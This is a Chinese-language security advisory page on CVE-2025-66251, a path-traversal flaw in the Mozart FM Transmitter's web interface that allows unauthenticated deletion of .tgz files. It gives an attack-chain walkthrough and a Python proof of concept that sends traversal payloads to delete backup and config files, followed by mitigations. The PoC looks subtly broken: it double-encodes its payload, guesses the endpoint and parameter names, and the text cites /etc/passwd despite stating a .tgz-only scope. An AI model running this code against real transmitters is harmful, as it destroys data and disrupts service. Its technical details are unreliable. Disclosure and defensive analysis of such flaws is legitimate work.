CVE-2025-66251 DB Electronica Mozart FM Transmitter 路径遍历任意文件删除漏洞

漏洞信息

漏洞编号

CVE-2025-66251

漏洞类型

路径遍历/任意文件删除

CVSS评分

9.1 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

DB Electronica Telecomunicazioni S.p.A. Mozart FM Transmitter

漏洞概述

CVE-2025-66251是DB Electronica Telecomunicazioni S.p.A.公司开发的Mozart FM Transmitter系列发射器中存在的一个严重安全漏洞。该漏洞允许未认证的远程攻击者通过路径遍历（Path Traversal）技术，利用deletehidden参数删除服务器上的任意.tgz文件。由于该漏洞无需任何认证即可利用，且CVSS评分高达9.1（严重级别），对使用受影响版本Mozart FM Transmitter的企业和个人用户构成极高安全风险。攻击者可通过精心构造的HTTP请求，利用路径遍历序列（如../）访问系统目录，绕过安全限制执行任意文件删除操作，可能导致系统配置文件、备份文件或关键业务数据被删除，进而造成服务中断或进一步的系统入侵。

技术细节

该漏洞源于Mozart FM Transmitter的Web管理界面中对用户输入验证不充分。攻击者可利用deletehidden参数，通过在HTTP请求中注入路径遍历序列（如../../etc/passwd或../../../var/backup/data.tgz）来访问和删除服务器文件系统中的任意.tgz文件。漏洞利用的关键点在于应用程序未能正确过滤或规范化用户提供的文件路径参数，导致攻击者可以逃逸出预期的安全目录上下文。由于deletehidden参数直接参与文件删除操作且缺乏权限验证，任何能够访问Web管理接口的未认证用户都可触发此漏洞。攻击成功后，攻击者可删除系统关键文件、备份存档或配置数据，可能导致发射器功能失效、配置数据丢失，甚至为后续更复杂的攻击（如远程代码执行）创造条件。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标Mozart FM Transmitter的Web管理接口版本，确认其属于受影响版本（30/50/100/300/500/1000/2000/3000/3500/6000/7000）

STEP 2

步骤2: 漏洞探测

攻击者访问Web管理界面的deletehidden端点，发送包含路径遍历序列的恶意请求，如../../../var/backup/data.tgz

STEP 3

步骤3: 路径遍历利用

服务器未能正确验证deletehidden参数中的路径遍历序列，允许攻击者绕过安全目录限制访问任意文件系统位置

STEP 4

步骤4: 任意文件删除

攻击者利用漏洞删除关键系统文件、备份存档或.tgz格式的配置文件，导致服务中断或数据丢失

STEP 5

步骤5: 扩大攻击影响

根据删除的文件类型，攻击者可能进一步利用配置缺失或备份丢失进行更深层次的网络入侵或持久化控制

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import urllib.parse

# CVE-2025-66251 PoC - Unauthenticated Path Traversal File Deletion
# Target: DB Electronica Mozart FM Transmitter
# Vulnerability: deletehidden parameter allows path traversal deletion of .tgz files

target_url = "http://target-ip:port"
delete_endpoint = f"{target_url}/api/deletehidden"

# Path traversal payload to delete arbitrary .tgz file
# This example attempts to delete a backup file outside the intended directory
path_traversal_payload = "../../../var/backup/backup_data.tgz"
encoded_payload = urllib.parse.quote(path_traversal_payload, safe='')

params = {
    'file': encoded_payload
}

print(f"[*] Sending malicious request to {delete_endpoint}")
print(f"[*] Payload: {path_traversal_payload}")

try:
    response = requests.get(delete_endpoint, params=params, timeout=10)
    print(f"[*] Status Code: {response.status_code}")
    print(f"[*] Response: {response.text}")
    
    if response.status_code == 200:
        print("[+] Request sent successfully - file deletion may have occurred")
    else:
        print("[-] Request failed")
except requests.exceptions.RequestException as e:
    print(f"[-] Error: {e}")

# Alternative PoC using POST method
post_data = {
    'path': '../../../etc/config.tgz',
    'action': 'delete'
}

print("\n[*] Trying POST request...")
try:
    post_response = requests.post(delete_endpoint, data=post_data, timeout=10)
    print(f"[*] Status Code: {post_response.status_code}")
    print(f"[*] Response: {post_response.text}")
except requests.exceptions.RequestException as e:
    print(f"[-] Error: {e}")

影响范围

Mozart FM Transmitter 30

Mozart FM Transmitter 50

Mozart FM Transmitter 100

Mozart FM Transmitter 300

Mozart FM Transmitter 500

Mozart FM Transmitter 1000

Mozart FM Transmitter 2000

Mozart FM Transmitter 3000

Mozart FM Transmitter 3500

Mozart FM Transmitter 6000

Mozart FM Transmitter 7000

防御指南

临时缓解措施

在官方补丁发布前，建议采取以下临时缓解措施：1）通过网络分段和访问控制列表（ACL）限制对Mozart FM Transmitter Web管理接口的访问，仅允许受信任的管理IP访问；2）部署Web应用防火墙（WAF）规则，检测并阻止包含路径遍历序列（../、..\、%2e%2e等）的HTTP请求；3）定期备份所有系统配置和重要数据文件，确保备份文件存储在安全隔离的位置；4）监控文件系统变更日志，及时发现异常的文件删除操作；5）考虑在不需要时禁用deletehidden功能或暂时关闭Web管理界面的文件操作功能。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-66251
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-66251
3 Details https://www.cvedetails.com/cve/CVE-2025-66251/
4 VulDB https://vuldb.com/cve/CVE-2025-66251
5 Link https://www.abdulmhsblog.com/posts/webfmvulns/